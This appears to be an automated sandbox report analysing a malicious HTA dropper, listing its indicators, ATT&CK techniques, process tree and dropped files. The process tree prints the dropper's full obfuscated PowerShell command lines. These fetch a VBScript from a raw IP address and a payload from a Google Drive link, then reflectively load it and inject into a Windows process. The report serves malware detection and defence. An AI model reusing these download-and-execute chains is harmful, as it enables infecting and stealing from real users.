d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6

Analysis

max time kernel
149s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07/11/2024, 06:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greatthingswithmegreatloverherehavewithmegreat.hta
Size

207KB
MD5

21bf484c8fe4564e1f0e0fc0aa522199
SHA1

0bda2d5048d1555ef9ef50f4fd192c0838677c94
SHA256

d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6
SHA512

1dbf4a2f78b482b6d80eb48c9c2434a8907081a468c820ad9085fcede6134fe41c8c27a3e8f2ad7fa3f1d702e2b0904d885bfda8300ced9c4924c6e869e9baea
SSDEEP

96:43F97gSlqxRtwJPcEI/MOoMQbvfhKGAfQ:43F1OxvmUxevfU3Q

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 30 IoCs

flow	pid	Process
13	3256	poWERSHElL.EXe
21	1800	powershell.exe
23	1800	powershell.exe
39	1800	powershell.exe
41	3268	mshta.exe
47	3268	mshta.exe
49	3268	mshta.exe
50	3268	mshta.exe
51	3268	mshta.exe
52	3268	mshta.exe
54	3268	mshta.exe
55	3268	mshta.exe
58	3268	mshta.exe
62	3268	mshta.exe
63	3268	mshta.exe
65	3268	mshta.exe
67	3268	mshta.exe
68	3268	mshta.exe
69	3268	mshta.exe
70	3268	mshta.exe
72	3268	mshta.exe
74	3268	mshta.exe
75	3268	mshta.exe
76	3268	mshta.exe
77	3268	mshta.exe
79	3268	mshta.exe
81	3268	mshta.exe
82	3268	mshta.exe
83	3268	mshta.exe
84	3268	mshta.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2376	powershell.exe
1800	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1372	powershell.exe
3256	poWERSHElL.EXe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	drive.google.com
21	drive.google.com

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1800 set thread context of 3456	1800	powershell.exe	111
PID 3456 set thread context of 3268	3456	aspnet_compiler.exe	82
PID 3456 set thread context of 2136	3456	aspnet_compiler.exe	112
PID 2136 set thread context of 3268	2136	ieUnatt.exe	82
PID 2136 set thread context of 3888	2136	ieUnatt.exe	114

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERSHElL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ieUnatt.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	ieUnatt.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	poWERSHElL.EXe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3256	poWERSHElL.EXe
3256	poWERSHElL.EXe
1372	powershell.exe
1372	powershell.exe
2376	powershell.exe
2376	powershell.exe
1800	powershell.exe
1800	powershell.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
3456	aspnet_compiler.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
3456	aspnet_compiler.exe
3268	mshta.exe
3268	mshta.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe
2136	ieUnatt.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3256	poWERSHElL.EXe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3268 wrote to memory of 3256	3268	mshta.exe	84
PID 3268 wrote to memory of 3256	3268	mshta.exe	84
PID 3268 wrote to memory of 3256	3268	mshta.exe	84
PID 3256 wrote to memory of 1372	3256	poWERSHElL.EXe	88
PID 3256 wrote to memory of 1372	3256	poWERSHElL.EXe	88
PID 3256 wrote to memory of 1372	3256	poWERSHElL.EXe	88
PID 3256 wrote to memory of 1600	3256	poWERSHElL.EXe	89
PID 3256 wrote to memory of 1600	3256	poWERSHElL.EXe	89
PID 3256 wrote to memory of 1600	3256	poWERSHElL.EXe	89
PID 1600 wrote to memory of 232	1600	csc.exe	90
PID 1600 wrote to memory of 232	1600	csc.exe	90
PID 1600 wrote to memory of 232	1600	csc.exe	90
PID 3256 wrote to memory of 1688	3256	poWERSHElL.EXe	103
PID 3256 wrote to memory of 1688	3256	poWERSHElL.EXe	103
PID 3256 wrote to memory of 1688	3256	poWERSHElL.EXe	103
PID 1688 wrote to memory of 2376	1688	WScript.exe	104
PID 1688 wrote to memory of 2376	1688	WScript.exe	104
PID 1688 wrote to memory of 2376	1688	WScript.exe	104
PID 2376 wrote to memory of 1800	2376	powershell.exe	106
PID 2376 wrote to memory of 1800	2376	powershell.exe	106
PID 2376 wrote to memory of 1800	2376	powershell.exe	106
PID 1800 wrote to memory of 3456	1800	powershell.exe	111
PID 1800 wrote to memory of 3456	1800	powershell.exe	111
PID 1800 wrote to memory of 3456	1800	powershell.exe	111
PID 1800 wrote to memory of 3456	1800	powershell.exe	111
PID 1800 wrote to memory of 3456	1800	powershell.exe	111
PID 1800 wrote to memory of 3456	1800	powershell.exe	111
PID 3268 wrote to memory of 2136	3268	mshta.exe	112
PID 3268 wrote to memory of 2136	3268	mshta.exe	112
PID 3268 wrote to memory of 2136	3268	mshta.exe	112
PID 2136 wrote to memory of 3888	2136	ieUnatt.exe	114
PID 2136 wrote to memory of 3888	2136	ieUnatt.exe	114

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegreatloverherehavewithmegreat.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3268
- C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe
  "C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'JEY2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSmtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVudktEYVVrdUgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWG9XdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRpaVh2ZEYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNWWNsQ2xJSEdibiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbk51UElVamZUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC4yMy83OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZXJsb3Zlci50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhncmVhdG1hZ2ljYWx0aGluZ3N3aXRoaGUudmJzIiwwLDApO3NUYXJULXNMRWVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZS52YnMi'+[ChAR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3256
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wy01jevo\wy01jevo.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9357.tmp" "c:\Users\Admin\AppData\Local\Temp\wy01jevo\CSC8DDE1D7C7AA4CEE913F2826E0A68A36.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:232
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCcxamdpbScrJ2FnZVVybCA9IDViSmh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIDViSjsxamd3ZWJDbGllbnQgPSBOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzFqJysnZ2ltYWdlQnl0ZXMgPSAxamd3ZWJDbGllbnQuRG93bmxvYWREYXRhKDFqZ2ltYWdlVXJsKTsxamdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOicrJzpVVEY4LkdldFN0cmluZygxamdpbWFnZUJ5JysndGVzKTsxamdzdGFydEZsYWcgPSAnKyc1Yko8PEJBU0U2NF9TVEFSVD4+NWJKOzFqZ2VuZEZsYWcgPSA1Yko8PCcrJ0JBU0U2NF9FTkQ+PjViSjsxamdzdGFydEluZGV4ID0nKycgMWpnaW1hZ2VUZXh0LicrJ0knKyduZGV4T2YoMWpnc3RhcnRGbGFnKTsxamdlbmRJbmRleCA9IDFqZ2knKydtYWdlVGV4dC5JbmRleE8nKydmKDFqZ2VuZEZsYWcpOzFqZ3N0YXJ0SW5kZXggLWdlICcrJzAgLWFuZCAxamdlbmRJbmRleCAtZ3QgMWpnc3RhcnRJbmRleDsxamdzdGFydEluZGV4ICs9IDFqZ3N0YXJ0RmxhZy5MZW5ndGg7MWpnYmFzZTY0JysnTGVuZ3RoID0gMWpnZW5kSW5kZXggLSAxamdzdGFydEluZGV4OzFqZ2JhJysnc2U2NENvbW1hbmQgPSAxamdpbWFnZVRleHQuU3Vic3RyaW5nJysnKDFqZ3N0YXJ0SW5kZXgsIDFqZ2Jhc2U2NExlbmd0aCk7MWpnYmFzZTY0UmV2ZScrJ3JzZWQgPSAtam9pbiAoMWpnYmFzZTY0Q29tbWEnKyduZC5Ub0NoYXJBcnJheSgpIDE1biBGb3JFYWNoLU9iamVjdCB7IDFqZ18gfSlbLTEuLi0oMWpnYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTsxamdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nKDFqZ2Jhc2U2NFJldmVyc2VkKTsxamdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06JysnOkxvYWQoMWpnY29tbWFuZEJ5dGVzKTsxamd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDViSlZBSTViSik7MWpndmFpTWV0aG8nKydkLkludm9rZSgxamdudWxsLCBAKDViSnR4dC5GQ0RSVy85Ny8zMi40LjM3MS43MDEvLzpwdHRoNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YicrJ0pkZXNhdGl2YWRvNWJKLCA1Ykphc3BuZXRfY29tcGlsZXI1YkosIDViSmRlc2F0aXZhZG81YkosIDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSjE1YkosNWJKZGVzYXRpdmFkbzViSikpOycpLlJlcGxhY0UoJzViSicsW1NUcklOZ11bQ2hhUl0zOSkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdNTMrW0NoYVJdMTEwKSxbU1RySU5nXVtDaGFSXTEyNCkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdMTA2K1tDaGFSXTEwMyksJyQnKXwgJiAoKGd2ICcqbWRyKicpLm5hTWVbMywxMSwyXS1KT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1800
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3456
- C:\Windows\SysWOW64\ieUnatt.exe
  "C:\Windows\SysWOW64\ieUnatt.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:3888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\poWERSHElL.EXe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
80f13e937d10c1625f99885a332d7ff8

SHA1
41858d6f8fedccde511f17f2b868dfa1c2567d95

SHA256
0fcd8ced71aeedbf25f5740a4b57723ca5798a6070f44da4d01cdbb96b2ffae9

SHA512
b45a9b5f175b6f14b8c5609acd221ac24e1f6c5689a1403404f0813453e8fc363b86ae927c1a7dc06317e4db83b7ac123a60cc298f8314c070015b1e2a82c47c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4fb4898217406a2a5d5078bc9f942169

SHA1
5555565b02398bab88a1d40096d2e7fe2287c444

SHA256
f07dccc4ee7f236c318b40c145d0af42ea67182be18f9eb9fcd1d6bca65d4c9d

SHA512
c441f65c562c4ce9e115e77f2d44c7588858499c2a7c4879d08373a210bba543769732814b46fb8eba2d2e11ddb4f0fbfad5bba50ef9bb73f4e9afc7cfef5542

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9357.tmp

Filesize
1KB

MD5
3255b4c156b33d0bd7e3c9f88a9fed6e

SHA1
e1179522b18ffd1d389c27312e7a8f167cb56304

SHA256
135a3ac5384d4f0400b166b0dfa07c5a33f9a331080a41867cd8059fdad0195e

SHA512
0993b18a7dd4c3625f3dd985df96c3b7b957a6cb264a3913c77247ae1832067e476f2951d0f59e3f2efe95635918760fec7def0c2a0ca64a30d760d7298a87da

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kynr5fz2.bxt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wy01jevo\wy01jevo.dll

Filesize
3KB

MD5
e7bf0fa01b6dba8705f0459a17c6f1d0

SHA1
757bd0e4861a3e81fd5ffb6c12cb688af5ceb2fa

SHA256
56bb5276a8aa7da78237136ebced913ce3c42e0c3f81608e87d73386a8dc7de8

SHA512
3cf7b6e59b02aa89e9a7d316da0c91a40b7897eb7e7e7720dffe63e7911aac06f97b4b2896414b64e4cc7aa77ac27fc3590190eda4345e779a4b82023157a054

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs

Filesize
138KB

MD5
3a172f4d749a3cf2a42e0b7df638c8d3

SHA1
071d3b7db5a649ec3252af5b5a21ed047e71c785

SHA256
fe03066a9d3659d5f1e5941c7a73646780d55d15a57a9dde5901f469db2ead72

SHA512
30cc1c96d8cae17800f33f63d7ef8965536051ee7ec683b45e5c62079bf9487785ccc9b8ae8ab073f25f9059f1bbf84f73f8c8ff68c807c0e7007d597dced0d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wy01jevo\CSC8DDE1D7C7AA4CEE913F2826E0A68A36.TMP

Filesize
652B

MD5
6356eb3b61d4fb2f5512bfe5e8974891

SHA1
4775d22d06c8f29f6b97da2e077ebaba4fe348fb

SHA256
2dba6886d28d6b892cb89230fc81046756f05bcd2b07e5bf0746bac85ffbe90a

SHA512
0b4721e427fefccf39c6fc5bf861ccdac81885a53d89d689d146e05542e0f8421a755f7c4a13c0ea0fe8956e85777903a8128f9f05db5cda941ce92bcb966bea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wy01jevo\wy01jevo.0.cs

Filesize
480B

MD5
02801ca1be5cf5616a9f398c85c263db

SHA1
e9000f0b5cd0dceb296fb59f9ed2c85717666377

SHA256
6d63144887d63ca3c8794b18c2e2283a7f5e6fdc5355fb24c0c3e7d11a172586

SHA512
4a27658c15203dd2122759a70db7f2917eb7a8899f9590f80a01b95d55a0631d0fce21d1ca6c9ec4111aabb7d9bdb9396f6483e42bb10850e9a9305d21616902

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wy01jevo\wy01jevo.cmdline

Filesize
369B

MD5
7f070b6afb5d1735bb7a690ee480c824

SHA1
d8ba0c0f94c7f9a8636d9983894dff5b27df1a00

SHA256
7a74ffd93a11dd4340363229285dff9b269fd07221711b66c498b75534950664

SHA512
dd286dd0a9cbdb8fa48a9e122be16c8509cf5fc48e0b7fcfd68018cfb96a5c2199ebf4b94d6e079c2161925ff97c30e6b61995d7da7d39e12caca2cd1b081985

Download Submit
memory/1372-29-0x0000000007800000-0x0000000007832000-memory.dmp

Filesize
200KB

Download
memory/1372-46-0x0000000007B70000-0x0000000007B81000-memory.dmp

Filesize
68KB

Download
memory/1372-30-0x000000006D6C0000-0x000000006D70C000-memory.dmp

Filesize
304KB

Download
memory/1372-40-0x0000000006C10000-0x0000000006C2E000-memory.dmp

Filesize
120KB

Download
memory/1372-41-0x0000000007840000-0x00000000078E3000-memory.dmp

Filesize
652KB

Download
memory/1372-42-0x0000000007FB0000-0x000000000862A000-memory.dmp

Filesize
6.5MB

Download
memory/1372-43-0x0000000007970000-0x000000000798A000-memory.dmp

Filesize
104KB

Download
memory/1372-44-0x00000000079D0000-0x00000000079DA000-memory.dmp

Filesize
40KB

Download
memory/1372-45-0x0000000007C00000-0x0000000007C96000-memory.dmp

Filesize
600KB

Download
memory/1372-50-0x0000000007BF0000-0x0000000007BF8000-memory.dmp

Filesize
32KB

Download
memory/1372-47-0x0000000007BA0000-0x0000000007BAE000-memory.dmp

Filesize
56KB

Download
memory/1372-48-0x0000000007BB0000-0x0000000007BC4000-memory.dmp

Filesize
80KB

Download
memory/1372-49-0x0000000007CC0000-0x0000000007CDA000-memory.dmp

Filesize
104KB

Download
memory/1800-104-0x0000000016690000-0x00000000167E8000-memory.dmp

Filesize
1.3MB

Download
memory/1800-105-0x00000000167F0000-0x000000001688C000-memory.dmp

Filesize
624KB

Download
memory/2136-111-0x0000000000800000-0x0000000000843000-memory.dmp

Filesize
268KB

Download
memory/2136-110-0x0000000000800000-0x0000000000843000-memory.dmp

Filesize
268KB

Download
memory/2376-92-0x0000000006020000-0x0000000006374000-memory.dmp

Filesize
3.3MB

Download
memory/3256-0-0x0000000070E0E000-0x0000000070E0F000-memory.dmp

Filesize
4KB

Download
memory/3256-65-0x0000000006E60000-0x0000000006E68000-memory.dmp

Filesize
32KB

Download
memory/3256-67-0x0000000070E0E000-0x0000000070E0F000-memory.dmp

Filesize
4KB

Download
memory/3256-68-0x0000000070E00000-0x00000000715B0000-memory.dmp

Filesize
7.7MB

Download
memory/3256-74-0x0000000007C70000-0x0000000007C92000-memory.dmp

Filesize
136KB

Download
memory/3256-75-0x0000000008B20000-0x00000000090C4000-memory.dmp

Filesize
5.6MB

Download
memory/3256-5-0x00000000058F0000-0x0000000005912000-memory.dmp

Filesize
136KB

Download
memory/3256-4-0x0000000070E00000-0x00000000715B0000-memory.dmp

Filesize
7.7MB

Download
memory/3256-82-0x0000000070E00000-0x00000000715B0000-memory.dmp

Filesize
7.7MB

Download
memory/3256-2-0x0000000070E00000-0x00000000715B0000-memory.dmp

Filesize
7.7MB

Download
